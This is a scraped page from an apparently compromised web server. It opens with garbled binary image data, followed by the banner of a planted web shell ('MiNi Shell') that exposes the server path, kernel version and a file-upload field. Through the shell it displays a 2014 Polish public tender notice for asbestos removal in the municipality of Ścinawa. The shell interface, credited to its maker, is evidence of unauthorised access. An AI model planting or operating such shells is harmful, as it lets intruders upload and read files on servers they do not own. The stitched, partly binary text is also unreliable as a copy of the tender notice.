JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140324/62281-N-2014.html

<p class="kh_header"><b>Ścinawa: Usuwanie wyrobów zawierających azbest z terenu miasta i gminy  Ścinawa - etap II</b><br>
<b>Numer ogłoszenia: 62281 - 2014; data zamieszczenia: 24.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Ścinawa , Rynek 17, 59-330 Ścinawa, woj. dolnośląskie, tel. 076 8412600, faks 076 8412601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.umig-scinawa.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie wyrobów zawierających azbest z terenu miasta i gminy  Ścinawa - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Nazwa zadania:
    Usuwanie wyrobów zawierających azbest z terenu miasta i gminy  Ścinawa - etap II.
2) Zakres prac obejmuje:
a) zadanie 1: demontaż, opakowanie, załadunek i transport na przystosowane do tego celu składowisko odpadów wyrobów zawierających azbest- 28,94 Mg, 
b) zadanie 2: opakowanie, załadunek i transport na przystosowane do tego celu składowisko odpadów zalegających na nieruchomościach wyrobów i odpadów zawierających azbest - 23,62 Mg, 
c) całkowita ilość wyrobów zawierających azbest - 52,56 Mg;
Wskazane wyżej ilości mogą ulec zmianie, gdyż ostateczna ilość ustalona będzie na podstawie kart przekazania odpadów. Wykaz nieruchomości, z których w 2014/2015 roku planowane jest usunięcie wyrobów zawierających azbest (w załączeniu), opracowano na podstawie dokumentacji inwentaryzacyjnej oraz informacji składnych do tut. Urzędu bezpośrednio przez podmioty wykorzystujące wyroby zawierające azbest. Zakres przedmiotu zamówienia może ulec zmianie również w przypadku, gdy faktyczny pomiar powierzchni oraz masy usuwanych wyrobów wykaże inną ilość tych wyrobów. Wykaz nieruchomości, z których w 2014/2015 roku  planowane jest usunięcie wyrobów zawierających azbest może ulec zmianie w przypadku rezygnacji właściciela nieruchomości.
3) Zakres prac, o którym mowa w ppkt 2 obejmuje również:
a) przed rozpoczęciem prac opracowanie szczegółowego planu prac usuwania wyrobów zawierających azbest dla każdej nieruchomości, w zakresie określonym w § 6 ust. 1 pkt 3 rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004 r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz.U. Nr 71, poz. 649 ze zm.). Plan prac winien być przedstawiony Zamawiającemu do wiadomości co najmniej 7 dni przed przystąpieniem przez Wykonawcę do ich wykonywania,
b) urządzenie własnym kosztem i staraniem zaplecza dla wykonywanych prac oraz zabezpieczenia terenu, na którym trwa usuwanie azbestu, zgodnie z obowiązującymi w tym zakresie przepisami,
c) sporządzenie dokumentacji fotograficznej obiektów sprzed rozpoczęcia usuwania z nich odpadów zawierających azbest oraz po ich usunięciu (z ilością zdjęć dokumentującą w sposób wyczerpujący stan faktyczny każdego z ww. etapów, w dwóch egzemplarzach w formie papierowej oraz w jednym egzemplarzu w wersji elektronicznej na informatycznym nośniku danych), 
d) demontaż, opakowanie, załadunek i transport na przystosowane do tego celu składowisko odpadów pokryć dachowych i elewacyjnych zawierających azbest (zadanie nr 1),
e) opakowanie, załadunek i transport na przystosowane do tego celu składowisko odpadów zalegających na nieruchomościach wyrobów zawierających azbest (zadanie nr 2),
f) obmiar i ważenie wyrobów zawierających azbest na każdej nieruchomości przy użyciu wagi posiadającej legalizację,
g) sporządzenie protokołu odbioru prac na okoliczność usunięcia wyrobów zawierających azbest z danej nieruchomości (dla każdej nieruchomości osobno) wraz z określeniem ilości odebranych odpadów w Mg, potwierdzonego podpisami przedstawiciela Wykonawcy oraz właściciela nieruchomości, w trzech egzemplarzach, z przeznaczeniem po jednym egzemplarzu dla właściciela nieruchomości, Wykonawcy oraz Zamawiającego,
h) uporządkowanie terenu po zakończeniu prac wraz z uzyskaniem oświadczenia właściciela nieruchomości o doprowadzeniu działek do należytego stanu i porządku,
i) udokumentowanie przekazania odpadu na składowisko - miejsce utylizacji (karta przekazania odpadu),
j) przekazanie dokumentów tj. protokołu odbioru prac, dokumentacji zdjęciowej, karty przekazania odpadów nastąpi w terminie 7 dni od przekazania odpadu na składowisko odpadów;
4) Usuwanie wyrobów zawierających azbest odbywać się będzie na podstawie harmonogramu prac sporządzonego na podstawie wykazu nieruchomości, określonych w załączniku nr 8 do SIWZ oraz ustalonych przez Wykonawcę terminów realizacji prac z właścicielami tych nieruchomości na zasadach określonych w ppkt od 5 do 7;
5) Na podstawie otrzymanego wykazu (załącznik nr 8 do SIWZ), Wykonawca ustali z właścicielami nieruchomości szczegółowe terminy rozpoczęcia i zakończenia prac, a o ustalonych terminach niezwłocznie powiadomi na piśmie Zamawiającego, nie później niż w ciągu 7 dni roboczych od dnia otrzymania wykazu;
6) Wykonawca przystąpi do prac związanych z demontażem wyrobów zawierających azbest z pokrycia dachowego nieruchomości po uzyskaniu od właściciela zaświadczenia o braku sprzeciwu do zgłoszenia robót budowlanych;
7) Ustalony termin wykonywania prac będzie aktualizowany na bieżąco i indywidualnie w przypadku wystąpienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac związanych z demontażem wyrobów zawierających azbest;
8) W przypadkach określonych w ppkt 7 Wykonawca ma obowiązek dokonać korekty terminu wykonywania prac w oparciu o czas trwania niekorzystnych warunków atmosferycznych, a o ustalonych terminach niezwłocznie powiadomi na piśmie Zamawiającego, nie później niż w ciągu 7 dni roboczych od dnia zaistnienia zdarzenia, z pisemnym uzasadnieniem zmiany terminu;
9) W przypadku zmiany terminu z powodu okoliczności wskazanych w ppkt 7, Wykonawcy nie służy roszczenie o zwrot kosztów (np. dojazdu na miejsce planowanych prac);
10) Wycofanie się z korzystania z usługi przez właściciela nieruchomości nie rodzi po stronie Wykonawcy prawa do domagania się od Zamawiającego roszczeń odszkodowawczych, w tym zapłaty kary umownej;
11) Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z zasadami wiedzy technicznej oraz obowiązującymi przepisami i normami, w tym rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. Nr 71, poz. 649 ze zm.);
12) Ponadto Wykonawca zobowiązany jest do:
a) zgłaszania właściwym organom zamiaru przystąpienia do prac, w terminie i zakresie określonym w § 6 ust. 2 i ust. 3 rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. Nr 71, poz. 649 ze zm.),
b) zapewnienia warunków bezpiecznego usuwania wyrobów zawierających azbest z miejsca ich występowania, w tym zabezpieczenia terenu, na którym trwa usuwanie wyrobów zawierających azbest, określonych w § 8 ust. 1 ww. rozporządzenia,
c) prowadzenia prac w sposób uniemożliwiający emisje azbestu do środowiska oraz powodujący zminimalizowanie pylenia, określony w § 8 ust. 2 ww. rozporządzenia,
d) złożenia właścicielowi nieruchomości pisemnego oświadczenia o prawidłowości      wykonania prac oraz o oczyszczeniu terenu z pyłu azbestowego, z zachowaniem właściwych przepisów technicznych i sanitarnych, zgodnie z § 8 ust. 3 ww. rozporządzenia,
e) transportu odpadów zawierających azbest na przystosowane do tego celu składowisko odpadów w sposób uniemożliwiający emisję azbestu do środowiska,
f) prowadzenie ilościowej i jakościowej ewidencji odpadów zgodnie z przyjętą klasyfikacją odpadów i w oparciu o wzory dokumentów stosowanych na potrzeby ewidencji odpadów;
13) Wykonawca zapewnia materiały i sprzęt oraz pracowników, niezbędnych do wykonywania przedmiotu umowy;
14) Wykonawca ponosi pełną odpowiedzialność za szkody majątkowe zaistniałe lub związane z realizacją umowy, wyrządzone osobom trzecim oraz za następstwa nieszczęśliwych wypadków pracowników i osób trzecich, powstałe w związku z wykonywaniem prac..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP - do 50 % wartości zamówienia podstawowego polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8, 45.26.26.60-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców ww.warunku na podstawie załączonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeśli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługi, a w przypadku świadczeń okresowych lub ciągłych również wykonuje te usługi odpowiadające swoim rodzajem przedmiotowi zamówienia, z podaniem ich wartości, daty wykonania i odbiorców tj.: minimum jedno zadanie w zakresie usuwania wyrobów zawierających azbest z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców ww.warunku na podstawie załączonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców ww.warunku na podstawie załączonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców ww.warunku na podstawie załączonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo: - W przypadku podpisywania oferty przez osoby niewymienione w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy, - W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) przedłużenia terminu realizacji przedmiotu zamówienia w przypadku niedotrzymania terminu umownego z przyczyn niezależnych od Wykonawcy spowodowanych warunkami atmosferycznymi uniemożliwiającymi wykonanie prac, w szczególności intensywnych lub długotrwałych opadów deszczu lub wstrzymania przez Zamawiającego wykonywania robót.
Termin realizacji zamówienia może ulec przedłużeniu, nie dłużej jednak niż o czas trwania okoliczności,
b) zmiany nazwy, siedziby stron umowy, osób do kontaktów pomiędzy stronami umowy oraz innych danych identyfikacyjnych, 
c) zmiany wykazu nieruchomości, stanowiącego załącznik nr 8 do SIWZ, w przypadkach losowych uniemożliwiających wykonanie demontażu wyrobów zawierających azbest,
d) zmniejszenia zakresu przedmiotu umowy z przyczyn o obiektywnym charakterze lub istotnej zmiany okoliczności, czego nie można było przewidzieć w chwili jej zawarcia,
e) zmiana harmonogramu realizacji zamówienia z powodu zmniejszenia zakresu, realizacji poszczególnych jego elementów,
f) zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w terminie 14 dni od przekazania umowy przez Wykonawcę,
g) zmiany ustawowej wysokości podatku VAT w przypadku gdy w trakcie realizacji przedmiotu Umowy nastąpi zmiana stawki podatku VAT dla usług objętych przedmiotem Umowy, Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za roboty, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umig-scinawa.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego, ul. Rynek 17, 59-330 Ścinawa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2014 godzina 13:00, miejsce: siedziba Zamawiającego, ul. Rynek 17, 59-330 Ścinawa - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Wojewódzki Fundusz Ochrony Środowiska i Gospodarki  Wodnej we Wrocławiu w ramach programu /Program priorytetowy NFOŚiGW cz.2 Usuwanie wyrobów zawierających azbest..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com